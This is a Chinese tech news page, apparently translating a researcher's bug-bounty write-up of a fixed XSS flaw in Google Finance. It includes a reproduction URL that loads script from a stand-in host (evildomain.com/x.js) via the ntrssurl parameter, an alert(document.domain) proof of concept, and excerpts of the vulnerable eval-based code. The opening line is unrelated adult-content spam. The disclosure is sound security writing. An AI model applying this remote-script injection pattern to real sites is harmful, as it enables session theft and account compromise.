自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

在谷歌財(cái)經(jīng)發(fā)現(xiàn)一個XSS漏洞,拿5千美元獎勵

開發(fā) 項(xiàng)目管理
這個問題出現(xiàn)在Google Finance中(google.com/finance)。它能欺騙Javascript的走勢圖應(yīng)用(源文件為/finance/f/sfe- opt.js),讓其載入一個托管在外部域上的文件,然后通過eval()方法將該文件內(nèi)容轉(zhuǎn)換成Javascript代碼并執(zhí)行。

我們在6月13日發(fā)了一篇資訊, 說“Google調(diào)整漏洞獎勵計(jì)劃,單個漏洞***獎勵7,500美元”。7月30日看到 Michele Spagnuolo 發(fā)的博文稱“他在 Google Finance 上發(fā)現(xiàn)并提交了一個 XSS 漏洞,谷歌安全團(tuán)隊(duì)確認(rèn)并修復(fù)了該漏洞。Michele 因此拿到了 5K 美元獎勵。” 以下是 Michele 博文的譯文。

這個問題出現(xiàn)在Google Finance中(google.com/finance)。它能欺騙Javascript的走勢圖應(yīng)用(源文件為/finance/f/sfe- opt.js),讓其載入一個托管在外部域上的文件,然后通過eval()方法將該文件內(nèi)容轉(zhuǎn)換成Javascript代碼并執(zhí)行。

這個過程不需要用戶交互,只要點(diǎn)擊一下URL就可以了。

復(fù)現(xiàn)步驟:

1)點(diǎn)擊該URL(目前已修復(fù)):

https://www.google.com/finance?chdet=1214596800000&q=NASDAQ:INTC&ntsp=2&ntrssurl=https://evildomain.com/x.js.

文件x.js包含下列驗(yàn)證代碼用來演示:

  1. alert(document.domain); 

該文件必須通過https來托管。

2)遠(yuǎn)程Javascript被執(zhí)行。

工作原理

以下是 /finance/f/sfe-opt.js中的兩個代碼片段,它們引起了這個安全問題。

  1. c.push("ntsp="); 
  2. c.push(b); 
  3. if (b == Vl.jj || b == Vl.kj) a = a.xc[ii(a.S)], a.lj() || (c.push("&ntrssurl="), c.push(escape(a.Cc || ""))); 
  4. return c.join("") 

在上面這段代碼中,URL參數(shù),更確切的說是ntrssurl參數(shù)(用戶RSS源的地址)被獲取并進(jìn)行了連接。

  1. Xi.prototype.send = function (a, b, c, d) { 
  2.     a = a || null; 
  3.     d = d || "_" + (Yi++).toString(36) + x().toString(36); 
  4.     n._callbacks_ || (n._callbacks_ = {}); 
  5.     var e = this.$s.Z(); 
  6.     if (a) 
  7.         for (var f in a) a.hasOwnProperty && !a.hasOwnProperty(f) || Fi(e, f, a[f]); 
  8.     b && (n._callbacks_[d] = Zi(d, b), Fi(e, this.Zs, "_callbacks_." + d)); 
  9.     b = Wi(e.toString(), { 
  10.         timeout: this.We, 
  11.         Ns: !0 
  12.     }); 
  13.     Si(b, null, $i(d, a, c), void 0); 
  14.     return { 
  15.         La: d, 
  16.         Du: b 
  17.     } 
  18. }; 

第二段代碼負(fù)責(zé)在外部域中查詢新聞源以將內(nèi)容顯示在走勢圖中。

它生成一個回調(diào)函數(shù)名,以字串 “?_CALLBACK_”結(jié)尾。函數(shù)Wi對URL中的ntrssurl參數(shù)中的域名執(zhí)行xmlhttprequest操作。

然后,返回了一段簡單的Javascript代碼,并且通過eval()方法將其執(zhí)行。

http://s2.51cto.com/wyfs01/M00/14/03/wKioJlIBrH-h6OtvAAEZKFDEOAg537.jpg

觸發(fā)XSS漏洞的截圖

callback 請求截圖

有漏洞的代碼片段

這個安全隱患很快就被修復(fù)了,我因此得到了5000美元的獎勵。

非常感謝,Google安全小組!

原文鏈接:http://miki.it/blog/2013/7/30/xss-in-google-finance/

譯文鏈接:http://blog.jobbole.com/44953/

責(zé)任編輯:陳四芳 來源: 伯樂在線
相關(guān)推薦

2021-02-07 00:05:27

谷歌漏洞網(wǎng)絡(luò)安全

2021-03-15 09:50:01

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2020-12-09 19:31:57

Chrome谷歌漏洞

2010-04-30 15:45:09

2022-09-09 18:37:56

漏洞賞金開源

2020-10-09 07:49:17

黑客

2020-10-14 10:39:50

漏洞網(wǎng)絡(luò)攻擊網(wǎng)絡(luò)安全

2015-02-10 14:32:37

XSS漏洞XSS

2015-01-04 15:36:52

XSS漏洞XSS

2015-03-26 14:04:57

2012-07-31 09:22:23

2022-01-26 07:47:22

黑客漏洞網(wǎng)絡(luò)安全

2013-05-13 10:24:44

谷歌開發(fā)團(tuán)隊(duì)開發(fā)管理

2021-12-07 23:11:15

漏洞微軟谷歌

2018-05-23 09:28:23

2010-06-11 17:08:05

2022-09-01 13:48:01

漏洞獎勵計(jì)劃漏洞

2017-02-16 15:47:12

2024-08-29 15:09:09

2017-12-29 18:37:35

支付寶大額紅包邏輯漏洞
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號